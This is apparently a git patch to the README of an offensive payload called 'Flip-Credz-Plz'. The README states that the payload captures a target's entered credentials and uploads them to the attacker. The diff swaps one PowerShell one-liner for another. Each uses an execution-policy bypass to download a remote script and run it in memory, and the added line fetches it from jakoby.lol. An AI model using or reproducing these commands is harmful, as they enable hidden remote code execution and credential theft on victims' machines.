From d4b06f5ca55320e9a1ad262d03bbf4b023d4b93c Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 22:05:52 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-Credz-Plz/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md index 2cbaffb..8a4187c 100644 --- a/Payloads/Flip-Credz-Plz/README.md +++ b/Payloads/Flip-Credz-Plz/README.md @@ -42,7 +42,7 @@ Once the target enters their credentials their information will be uploaded to y * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +powershell -noexit -ep bypass $db='';iwr https://jakoby.lol/35k | iex ```

(back to top)